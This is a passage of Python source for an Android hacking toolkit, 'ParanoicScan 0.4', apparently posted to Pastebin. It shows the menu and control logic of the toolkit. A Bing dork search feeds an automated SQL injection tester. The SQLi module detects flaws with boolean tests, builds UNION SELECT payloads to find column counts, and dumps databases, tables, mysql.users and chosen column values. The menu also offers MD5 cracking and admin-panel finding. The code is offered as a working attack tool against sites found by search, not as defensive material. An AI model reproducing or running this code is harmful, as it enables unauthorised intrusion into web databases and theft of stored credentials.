  659. op = aplicacion.dialogGetResponse().result
  660.  
  661. if op["which"] == "positive" :
  662. menuencoder()
  663.  
  664. if reb==5:
  665. menu()
  666.  
  667. def menusql():
  668.  
  669. aplicacion.dialogCreateAlert("SQLI Scanner")
  670. aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
  671. aplicacion.dialogShow()
  672. reez = aplicacion.dialogGetResponse().result
  673. opsql = reez["item"]
  674.  
  675. if opsql==0:
  676.  
  677. aplicacion.dialogCreateAlert("SQLI Scanner")
  678. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
  679. aplicacion.dialogShow()
  680.  
  681. don = showtables(webvul)
  682.  
  683. aplicacion.dialogDismiss()
  684.  
  685. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  686. aplicacion.dialogSetPositiveButtonText("Done")
  687. aplicacion.dialogShow()
  688.  
  689. op = aplicacion.dialogGetResponse().result
  690.  
  691. if op["which"] == "positive" :
  692. menusql()
  693.  
  694. if opsql==1 :
  695.  
  696. aplicacion.dialogCreateAlert("SQLI Scanner")
  697.  
  698. aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  699. ref = aplicacion.dialogGetResponse().result
  700.  
  701. if not ref['which'] == 'positive' :
  702. menusql()
  703. else:
  704. tabla = ref['value']
  705.  
  706. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
  707. aplicacion.dialogShow()
  708.  
  709. don = showcolumns(webvul,tabla)
  710.  
  711. aplicacion.dialogDismiss()
  712.  
  713. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  714. aplicacion.dialogSetPositiveButtonText("Done")
  715. aplicacion.dialogShow()
  716.  
  717. op = aplicacion.dialogGetResponse().result
  718.  
  719. if op["which"] == "positive" :
  720. menusql()
  721.  
  722. if opsql==2 :
  723.  
  724. aplicacion.dialogCreateAlert("SQLI Scanner")
  725. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
  726. aplicacion.dialogShow()
  727.  
  728. don = showdbs(webvul)
  729.  
  730. aplicacion.dialogDismiss()
  731.  
  732. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  733. aplicacion.dialogSetPositiveButtonText("Done")
  734. aplicacion.dialogShow()
  735.  
  736. op = aplicacion.dialogGetResponse().result
  737.  
  738. if op["which"] == "positive" :
  739. menusql()
  740.  
  741. if opsql==3 :
  742.  
  743. aplicacion.dialogCreateAlert("SQLI Scanner")
  744.  
  745. aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  746. ref = aplicacion.dialogGetResponse().result
  747.  
  748. if not ref['which'] == 'positive' :
  749. menusql()
  750. else:
  751. db = ref['value']
  752.  
  753. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
  754. aplicacion.dialogShow()
  755.  
  756. don = showtablesdb(webvul,db)
  757.  
  758. aplicacion.dialogDismiss()
  759.  
  760. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  761. aplicacion.dialogSetPositiveButtonText("Done")
  762. aplicacion.dialogShow()
  763.  
  764. op = aplicacion.dialogGetResponse().result
  765.  
  766. if op["which"] == "positive" :
  767. menusql()
  768.  
  769. if opsql==4 :
  770.  
  771. aplicacion.dialogCreateAlert("SQLI Scanner")
  772.  
  773. aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
  774. ref = aplicacion.dialogGetResponse().result
  775.  
  776. if not ref['which'] == 'positive' :
  777. menusql()
  778. else:
  779. db = ref['value']
  780.  
  781. aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  782. ref = aplicacion.dialogGetResponse().result
  783.  
  784. if not ref['which'] == 'positive' :
  785. menusql()
  786. else:
  787. tabla = ref['value']
  788. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
  789. aplicacion.dialogShow()
  790.  
  791. don = showcolumnsdb(webvul,db,tabla)
  792.  
  793. aplicacion.dialogDismiss()
  794.  
  795. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  796. aplicacion.dialogSetPositiveButtonText("Done")
  797. aplicacion.dialogShow()
  798.  
  799. op = aplicacion.dialogGetResponse().result
  800.  
  801. if op["which"] == "positive" :
  802. menusql()
  803.  
  804. if opsql==5 :
  805.  
  806. aplicacion.dialogCreateAlert("SQLI Scanner")
  807. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
  808. aplicacion.dialogShow()
  809.  
  810. don = mysqluser(webvul)
  811.  
  812. aplicacion.dialogDismiss()
  813.  
  814. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  815. aplicacion.dialogSetPositiveButtonText("Done")
  816. aplicacion.dialogShow()
  817.  
  818. op = aplicacion.dialogGetResponse().result
  819.  
  820. if op["which"] == "positive" :
  821. menusql()
  822.  
  823. if opsql==6 :
  824.  
  825. aplicacion.dialogCreateAlert("SQLI Scanner")
  826. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
  827. aplicacion.dialogShow()
  828.  
  829. don = more(webvul)
  830.  
  831. aplicacion.dialogDismiss()
  832.  
  833. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  834. aplicacion.dialogSetPositiveButtonText("Done")
  835. aplicacion.dialogShow()
  836.  
  837. op = aplicacion.dialogGetResponse().result
  838.  
  839. if op["which"] == "positive" :
  840. menusql()
  841.  
  842. if opsql==7 :
  843.  
  844. aplicacion.dialogCreateAlert("SQLI Scanner")
  845.  
  846. aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  847. ref = aplicacion.dialogGetResponse().result
  848.  
  849. if not ref['which'] == 'positive' :
  850. menusql()
  851. else:
  852. tabla = ref['value']
  853.  
  854. aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
  855. ref = aplicacion.dialogGetResponse().result
  856.  
  857. if not ref['which'] == 'positive' :
  858. menusql()
  859. else:
  860. columna1 = ref['value']
  861. aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
  862. ref = aplicacion.dialogGetResponse().result
  863. if not ref['which'] == 'positive' :
  864. menusql()
  865. else:
  866. columna2 = ref['value']
  867. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
  868. aplicacion.dialogShow()
  869.  
  870. don = dumper(webvul,tabla,columna1,columna2)
  871.  
  872. aplicacion.dialogDismiss()
  873. aplicacion.dialogCreateAlert("SQLI Scanner",don)
  874. aplicacion.dialogSetPositiveButtonText("Done")
  875. aplicacion.dialogShow()
  876. op = aplicacion.dialogGetResponse().result
  877.  
  878. if op["which"] == "positive" :
  879. menusql()
  880.  
  881. if opsql==8:
  882. menu()
  883.  
  884. def menu():
  885.  
  886. aplicacion.dialogCreateAlert("ParanoicScan 0.4 (C) Doddy Hackman 2015")
  887. aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
  888. aplicacion.dialogShow()
  889. re = aplicacion.dialogGetResponse().result
  890. re2 = re["item"]
  891.  
  892. if re2==0:
  893.  
  894. aplicacion.dialogCreateAlert("BingHack Tool")
  895.  
  896. aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
  897. ref = aplicacion.dialogGetResponse().result
  898.  
  899. if not ref['which'] == 'positive' :
  900. menu()
  901. else:
  902. dork = ref['value']
  903.  
  904. aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
  905. ref = aplicacion.dialogGetResponse().result
  906.  
  907. if not ref['which'] == 'positive' :
  908. menu()
  909. else:
  910. paginas = ref['value']
  911.  
  912. paginas = str(paginas)
  913.  
  914. aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
  915. aplicacion.dialogShow()
  916.  
  917. founds = ""
  918. rez = ""
  919. rtafinal = ""
  920.  
  921. founds = bingscan(dork,paginas)
  922.  
  923. aplicacion.dialogDismiss()
  924.  
  925. aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
  926. aplicacion.dialogShow()
  927.  
  928. rez = sqltest(founds)
  929.  
  930. if len(rez) == 0 :
  931. rtafinal = "[-] Not Found"
  932. else :
  933. rtafinal = "[++] Pages Founds\n\n"
  934. rtafinal = rtafinal + rez
  935. rtafinal = rtafinal + "\n[++] Finished\n"
  936.  
  937. aplicacion.dialogDismiss()
  938.  
  939. aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
  940. aplicacion.dialogSetPositiveButtonText("Done")
  941. aplicacion.dialogShow()
  942.  
  943. op = aplicacion.dialogGetResponse().result
  944. if op["which"] == "positive" :
  945. menu()
  946.  
  947. if re2==1 :
  948.  
  949. global webvul
  950.  
  951. aplicacion.dialogCreateAlert("SQLI Scanner")
  952.  
  953. aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
  954. ref = aplicacion.dialogGetResponse().result
  955.  
  956. if not ref['which'] == 'positive' :
  957. menu()
  958. else:
  959. web = ref['value']
  960. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
  961. aplicacion.dialogShow()
  962.  
  963. pass1,pass2 = bypass("--")
  964. code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
  965. codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  966.  
  967. if not code==codedos:
  968. aplicacion.dialogDismiss()
  969. aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
  970. aplicacion.dialogSetPositiveButtonText("Done")
  971. aplicacion.dialogShow()
  972. op = aplicacion.dialogGetResponse().result
  973. if op["which"] == "positive" :
  974.  
  975. pass1,pass2 = bypass("--")
  976. rtacondata = ""
  977. control_sql = 0
  978.  
  979. aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
  980. aplicacion.dialogShow()
  981.  
  982. number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  983. for te in range(2,30):
  984. number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  985. code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  986. if(regexver(code)):
  987. numbers = regexdar(code)
  988.  
  989. control_sql = 1
  990.  
  991. rtacondata = rtacondata + "[+] Column length : "+str(te)
  992. rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
  993.  
  994. sql = ""
  995. tex = te + 1
  996. for sqlix in range(2,tex):
  997. sql = str(sql)+","+str(sqlix)
  998. sqli = str(1)+sql
  999. sqla = reem(sqli,numbers[0])
  1000. aplicacion.dialogDismiss()
  1001. aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
  1002. aplicacion.dialogSetPositiveButtonText("Done")
  1003. aplicacion.dialogShow()
  1004. op = aplicacion.dialogGetResponse().result
  1005. if op["which"] == "positive" :
  1006. webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
  1007. menusql()
  1008.  
  1009. if control_sql==0:
  1010.  
  1011. aplicacion.dialogDismiss()
  1012. aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
  1013. aplicacion.dialogSetPositiveButtonText("Done")
  1014. aplicacion.dialogShow()
  1015. op = aplicacion.dialogGetResponse().result
  1016. if op["which"] == "positive" :
  1017. aplicacion.exit()
  1018.  
  1019. else:
  1020. aplicacion.dialogDismiss()
  1021. aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
  1022. aplicacion.dialogSetPositiveButtonText("Done")
  1023. aplicacion.dialogShow()
  1024. op = aplicacion.dialogGetResponse().result
  1025. if op["which"] == "positive" :
  1026. aplicacion.exit()
  1027.  
  1028. if re2==2 :
  1029.  
  1030. aplicacion.dialogCreateAlert("MD5 Cracker")
  1031.  
  1032. aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
  1033. ref = aplicacion.dialogGetResponse().result
  1034.  
  1035. if not ref['which'] == 'positive' :
  1036. menu()
  1037. else:
  1038. target = ref['value']
  1039.  
  1040. aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
  1041. aplicacion.dialogShow()
  1042.  
  1043. don = crackmd5(target)
  1044.  
  1045. aplicacion.dialogDismiss()
  1046.  
  1047. aplicacion.dialogCreateAlert("MD5 Cracker",don)
  1048. aplicacion.dialogSetPositiveButtonText("Done")
  1049. aplicacion.dialogShow()
  1050.  
  1051. op = aplicacion.dialogGetResponse().result
  1052.  
  1053. if op["which"] == "positive" :
  1054. menu()
  1055.  
  1056. if re2==3 :
  1057.  
  1058. aplicacion.dialogCreateAlert("Admin Finder")
  1059.  
  1060. aplicacion.dialogGetInput("Admin Finder","Enter Target")
  1061. ref = aplicacion.dialogGetResponse().result
  1062.  
  1063. if not ref['which'] == 'positive' :
  1064. menu()
  1065. else:
  1066. target = ref['value']
  1067.  
  1068. aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
  1069. aplicacion.dialogShow()
  1070.  
  1071. don = scanpanel(target)
  1072.  
  1073. aplicacion.dialogDismiss()
  1074.  
  1075. aplicacion.dialogCreateAlert("Admin Finder",don)
  1076. aplicacion.dialogSetPositiveButtonText("Done")
  1077. aplicacion.dialogShow()
  1078.  
  1079. op = aplicacion.dialogGetResponse().result
  1080.  
  1081. if op["which"] == "positive" :
  1082. menu()
  1083.  
  1084. if re2==4 :
  1085.  
  1086. aplicacion.dialogCreateAlert("LocateIP")
  1087.  
  1088. aplicacion.dialogGetInput("LocateIP","Enter Target")
  1089. ref = aplicacion.dialogGetResponse().result
  1090.  
  1091. if not ref['which'] == 'positive' :
  1092. menu()
  1093. else:
  1094. target = ref['value']
  1095.  
  1096. aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
  1097. aplicacion.dialogShow()
  1098.  
  1099. don = locateip(target)
  1100.  
  1101. aplicacion.dialogDismiss()
  1102.  
  1103. aplicacion.dialogCreateAlert("LocateIP",don)
  1104. aplicacion.dialogSetPositiveButtonText("Done")
  1105. aplicacion.dialogShow()
  1106.  
  1107. op = aplicacion.dialogGetResponse().result
  1108.  
  1109. if op["which"] == "positive" :
  1110. menu()
  1111.  
  1112. if re2==5 :
  1113.  
  1114. aplicacion.dialogCreateAlert("HTTP FingerPrinting")
  1115.  
  1116. aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
  1117. ref = aplicacion.dialogGetResponse().result
  1118.  
  1119. if not ref['which'] == 'positive' :
  1120. menu()
  1121. else:
  1122. target = ref['value']
  1123.  
  1124. aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
  1125. aplicacion.dialogShow()
  1126.  
  1127. don = httpfinger(target)
  1128.  
  1129. aplicacion.dialogDismiss()
  1130.  
  1131. aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
  1132. aplicacion.dialogSetPositiveButtonText("Done")
  1133. aplicacion.dialogShow()
  1134.  
  1135. op = aplicacion.dialogGetResponse().result
  1136.  
  1137. if op["which"] == "positive" :
  1138. menu()
  1139.  
  1140. if re2==6 :
  1141. menuencoder()
  1142.  
  1143. if re2==7 :
  1144.  
  1145. about = "This program was written by Doddy Hackman in the summer of 2015"
  1146. aplicacion.dialogCreateAlert("About",about)
  1147. aplicacion.dialogSetPositiveButtonText("Done")
  1148. aplicacion.dialogShow()
  1149.  
  1150. op = aplicacion.dialogGetResponse().result
  1151.  
  1152. if op["which"] == "positive" :
  1153. menu()
  1154.  
  1155. if re2==8 :
  1156. aplicacion.exit()
  1157.  
  1158. menu()
  1159.  
  1160. # The End ?
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!